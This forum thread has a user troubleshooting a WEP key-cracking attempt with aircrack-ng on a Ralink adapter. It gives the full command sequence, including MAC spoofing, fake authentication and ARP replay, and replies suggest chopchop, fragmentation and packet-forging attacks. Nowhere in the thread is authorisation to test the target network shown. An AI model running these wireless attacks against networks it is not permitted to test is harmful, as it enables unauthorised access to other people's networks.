Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

[dragmnl123]

Hello everyone.

First of all I made a seach in the wiki and in this forum but I didn't find anything relevant. In google there are many people having my same problem but the only solution I found is "enable monitor mode and wait" but it doesn't work for me.

>> Introduction:
I'm using Backtrack 5 R2 (live cd). GNOME. Architecture: 64-bit
My chipset is Ralink RT2870/3070 and according to official wiki works: http://www.backtrack-linux.org/wiki/..._working_cards

I also tried by myself injection test ( aireplay-ng -9 wlan1 ) and it says "injection working!" and then lists the AP available (I did this after chanching the channel of my interface to the channel where the target AP is: iwconfig wlan1 channel 6 (it is wlan1,and not wlan0,because I have two wireless adapters)

My problem is that airodump gets many packets but "0 ARP requests" and "send 0 packets"

>> Details
(of course where I say <my fake mac>,<my target mac> etc.. is just for privacy,but I wrote the correct MacS
There is was I did:

airmon-ng start wlan1

Code:

Interface	Chipset		Driver

wlan1		Ralink RT2870/3070	rt2800usb - [phy1]
				(monitor mode enabled on mon0)
wlan0		Atheros AR9285	ath9k - [phy0]

aireplay-ng -9 mon0

Code:

04:50:57  Trying broadcast probe requests...
04:50:57  Injection is working!
04:50:59  Found 10 APs

04:50:59  Trying directed probe requests...
04:50:59  <mac> - channel: 6 - 'AP_NAME'
04:50:59  Ping (min/avg/max): 1.418ms/3.128ms/7.077ms Power: -67.87
04:50:59  30/30: 100%

< More AP >

airmon-ng start mon0 6

Code:

Interface	Chipset		Driver

mon0		Ralink RT2870/3070	rt2800usb - [phy1]
				(monitor mode enabled on mon1)
wlan1		Ralink RT2870/3070	rt2800usb - [phy1]
wlan0		Atheros AR9285	ath9k - [phy0]

ifconfig mon0 down
macchanger --mac <fake mac> mon0

Code:

Current MAC: <my wlan1/mon0/mon1 true mac> (<mac producer>)
Faked MAC:   <fake mac> (unknown)

airodump-ng -c 6 -w wep123 --bssid <my target mac> mon1

(Partial output,I can't copy-paste from the window due to it refreshs every second)

Code:

***
CH 6 ] [Elapsed: 3 mins] <date> <hour>
BSSID PWR ......
<my target mac> -37 24 ....

BSSID STATION ......

==> ctrl+shift+N to Open a new console (second console):

aireplay-ng -1 0 -a <mac of target> -h <fake mac> mon1

Code:

05:11:45  Sending Authentication Request (Open System) [ACK]
05:11:45  Authentication successful
05:11:45  Sending Association Request [ACK]

<looping the same 3 lines..>

After this I noticed a new line appeared in the first console***

Updated code:

Code:

***
CH 6 ] [Elapsed: 3 mins] <date> <hour>
BSSID PWR ......
<my target mac> -37 24 ....

BSSID STATION .....
<target mac> <my fake mac> ...

==> ctrl+shift+N to Open a new console (third console):

aireplay-ng -3 -b <mac of target> -h <fake mac> mon1

Code:

05:16:45  Waiting for beacon frame (BSSID: <mac of the target>) on channel 6
Saving ARP requests in replay_arp-0518-051645.cap
You should also start airodump-ng to capture replies.
Read 5797 packets (got 0 ARP requests and 25 ACKs), sent 0 packets...(0 pps)

And even when 80000 packets have been read still 0 ARP and 0 sent and 0 pps.

Finally I tried (in a fourth window):

aircrack-ng -b <mac of target> replay_arp-0518-051645.cap

Code:

Opening replay_arp-0518-051645.cap
No matching network found - check your bssid.


Quitting aircrack-ng...

The solutions I tried is to do:
- airodump-ng -c 6 -w wep123 --bssid <my target mac> mon0 (and also in the following using mon0 instead of mon1)
- I tried to use my true mac and also the fac mac in combination with mon 0 and/or mon1
- I tried to first start capturing packet,then putting in

But the result is always the same.

Thank you for any hint!
Regards

[sickness]

I would suggest that you go to the aircrack official website and document yourself more about what this attack does, you are missing one of the key steps in getting it to work so in your case it's normal that you can not capture ARP requests.

[dragmnl123]

I would suggest that you go to the aircrack official website and document yourself more about what this attack does, you are missing one of the key steps in getting it to work so in your case it's normal that you can not capture ARP requests.

@sickness First of all thank you very much for answering.
I'd like to ask you: what step am I missing?
I've already followed various tutorials (from different sources) and of course made some searches in aircrack website but I'm confused.. I really don't have any idea what I'm doing bad. I don't pretend that you tell me exactly "what command to write" but please tell me what "action" is missing

Thank you very much for helping
Regards

[dragmnl123]

@sickness First of all thank you very much for answering.
I'd like to ask you: what step am I missing?
I've already followed various tutorials (from different sources) and of course made some searches in aircrack website but I'm confused.. I really don't have any idea what I'm doing bad. I don't pretend that you tell me exactly "what command to write" but please tell me what "action" is missing

Thank you very much for helping
Regards

any hint please? I looked in aircrack web site but really I can't understand what's missing..

[maverik35]

What router are you auditing?..

Try another attack, you are using the Fake Auth attack..Try chop-chop, fragmentation, interactive packet.

Not all injected packets are allowed by router..That is why is not capturing any packets, because the router is not accepting the injected packets, therefore no Initialization Vectors are issued by router (IV's)...Try another attack...This is not as simple as "I'm injecting", "Easy as 123"..No, please, no...Do not take anything for granted...

You try to attack and if it fails, try another attack...Analyze info from airodump-ng before attacking with airoplay-ng. Please, also try to read all info in airodump is showing in your terminal....

Read here: http://www.aircrack-ng.org/doku.php?id=aireplay-ng.

good Luck...

[ShadowMaster]

You need to generate arp traffic to use an arp replay attack. Either deauth a client, or if there is none, korek or chopchop to get the keystream, and packetforge a fake arp then replay. At this point using a -3 attack as opposed to a -2 -r [fake arp] is stupid, but theoretically it can be done. The step you are missing is having real traffic generated and playing with it...

@sickness: TRY HARDER FTW!!!

[dragmnl123]

@ShadowMaster Could you speak more clearly to a "newbye"? For example...wha'ts korek? And packetforge?
@maverik35 Well..I don't know router model. And finally I got ARP response.. simply repeating many times the steps i told in the beggining . I also tried every other attack avalaible in aireplay-ng .. The only "result" has been with attack "ARP replay" (-3), I got many Iv's (as much as 7000-8000 in 5-6-7 hours) but neither with aircrack-ptw neither with aircrack-ptw I got the key..

However I'll try more times

[ShadowMaster]

korek==chopchop==-4 or -5 don't recall which. the other is the packet fragmentation attack. Either one will get you a prga keystream .xor that you can then use with packetforge to forge an arp packet to inject with -2 -r [packet]. Also 7000-8000 is in general nowhere near enough to crack... When you successfully use -5 or -4 to gain a PRGA keystream, then either look up packetforge usage or post again here for further info.

[Androlegend]

brother I have the same problem I have wairless dlink dwa-125 chipset RT2870/3070
you managed to have invaded a WEP key??how?